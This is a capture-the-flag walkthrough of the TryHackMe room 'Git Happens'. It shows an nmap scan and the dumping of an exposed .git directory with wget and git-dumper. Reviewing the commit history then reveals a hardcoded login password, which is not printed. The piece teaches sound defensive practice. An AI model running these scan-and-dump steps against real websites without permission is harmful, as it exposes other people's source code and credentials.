Tryhackme Walkthrough of Git Happens

1. Introduction#

Before Getting Started

This is a Short Room from tryhackme which can completed by tracking down the changes made through version Git is a distributed version-control system for tracking changes in source code during software development. It is designed for coordinating work among programmers, but it can be used to track changes in any set of files.

There is only one task in this room

Our Objective is to obtain the password for the login

2.Enumeration#

As always lets start with our nmap

1
nmap -sS -A 10.10.47.137

1
─[zen-prime@zerr0-satellite]─[~/htb/githappens]
2
└──╼ [★]$ sudo nmap -sS -A 10.10.47.137
3
[sudo] password for zen-prime:
4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 22:43 IST
5
Nmap scan report for 10.10.47.137
6
Host is up (0.22s latency).
7
Not shown: 999 closed ports
8
PORT   STATE SERVICE VERSION
9
80/tcp open  http    nginx 1.14.0 (Ubuntu)
10
| http-git:
11
|   10.10.47.137:80/.git/
12
|     Git repository found!
13
|_    Repository description: Unnamed repository; edit this file 'description'
14
|     to name the...
15
|_http-server-header: nginx/1.14.0 (Ubuntu)
16
|_http-title: Super Awesome Site!
17
No exact OS matches for host (If you know what OS is running on it, see

As nmap shows that there is only one service is running on this machine 80 http

also nmap found a directory called .git and it is Git Repository

Lets First Check our Index Page

Index page

It just shows a Simple Login Page

3. Cracking#

I tried some default credentials for this page but nothing happends

Let move on to the next

From Nmap result we identify a hidden directory called .git which reveals that it is Github Repository

so lets check that out

.git hidden directory

Here we use a tool called Git Dumper to clone this repository to our local machine which will help us look around on it.

or We can simply use our wget command also to download this report

1
wget -m -I .git http://10.10.47.137/.git

Here

-m : <To mirror the directory, —mirror

-I : list of allowed directories

We can use tool at this time

after downloading the tool . Let start cloneing

1
./git-dumper.py http://10.10.47.137/.git git-dump

git-dump.py

It will take some few minutes to completly clone the repository

Now using the git command we can now successfully look this repository

1
git log

1
  ──[zen-prime@zerr0-satellite]─[~/htb/githappens/git-dumper/git-dump/.git]
2
  └──╼ [★]$ git log
3
  commit d0b3578a628889f38c0affb1b75457146a4678e5 (HEAD -> master, tag: v1.0)
4
  Author: Adam Bertrand <hydragyrum@gmail.com>
5
  Date:   Thu Jul 23 22:22:16 2020 +0000
6

7
    Update .gitlab-ci.yml
8

9
  commit 77aab78e2624ec9400f9ed3f43a6f0c942eeb82d
10
  Author: Hydragyrum <hydragyrum@gmail.com>
11
  Date:   Fri Jul 24 00:21:25 2020 +0200
12

13
    add gitlab-ci config to build docker file.
14

15
  commit 2eb93ac3534155069a8ef59cb25b9c1971d5d199
16
  Author: Hydragyrum <hydragyrum@gmail.com>
17
  Date:   Fri Jul 24 00:08:38 2020 +0200
18

19
    setup dockerfile and setup defaults.
20

21
  commit d6df4000639981d032f628af2b4d03b8eff31213
22
  Author: Hydragyrum <hydragyrum@gmail.com>
23
  Date:   Thu Jul 23 23:42:30 2020 +0200
24

25
    Make sure the css is standard-ish!
26

27
  commit d954a99b96ff11c37a558a5d93ce52d0f3702a7d
28
  Author: Hydragyrum <hydragyrum@gmail.com>
29
  Date:   Thu Jul 23 23:41:12 2020 +0200
30

31
    re-obfuscating the code to be really secure!
32

33
  commit bc8054d9d95854d278359a432b6d97c27e24061d
34
  Author: Hydragyrum <hydragyrum@gmail.com>
35
  Date:   Thu Jul 23 23:37:32 2020 +0200
36

37
  Security says obfuscation isn't enough.
38

39
  commit e56eaa8e29b589976f33d76bc58a0c4dfb9315b1
40
  Author: Hydragyrum <hydragyrum@gmail.com>
41
  Date:   Thu Jul 23 23:25:52 2020 +0200
42

43
      Obfuscated the source code.
44

45
      Hopefully security will be happy!
46

47
  commit 395e087334d613d5e423cdf8f7be27196a360459
48
  Author: Hydragyrum <hydragyrum@gmail.com>
49
  Date:   Thu Jul 23 23:17:43 2020 +0200
50

51
      Made the login page, boss!
52

53
  commit 2f423697bf81fe5956684f66fb6fc6596a1903cc
54
  Author: Adam Bertrand <hydragyrum@gmail.com>
55
  Date:   Mon Jul 20 20:46:28 2020 +0000
56

57
      Initial commit

From the commits e56eaa8e29b589976f33d76bc58a0c4dfb9315b1 & e56eaa8e29b589976f33d76bc58a0c4dfb9315b1

we can understand that the source code is obsulated there. so lets check

the previous commit 395e087334d613d5e423cdf8f7be27196a360459 done by the Author which also shows that the Login Page is Maded.

1
git show 395e087334d613d5e423cdf8f7be27196a360459

Looking at the result and scrolling through it we can see a login() written in javascript which reveals

the Password for the Login Page.

4. Conclusion#

The Room was great .Keep in mind that nowdays many websites exposes the .git repositories to public. So cloneing or mirroring these repo can lead exposes the contents inside it. It is better to delete these git from the webserver to ensure the Security.

Hope We learned something new from this.

Thanks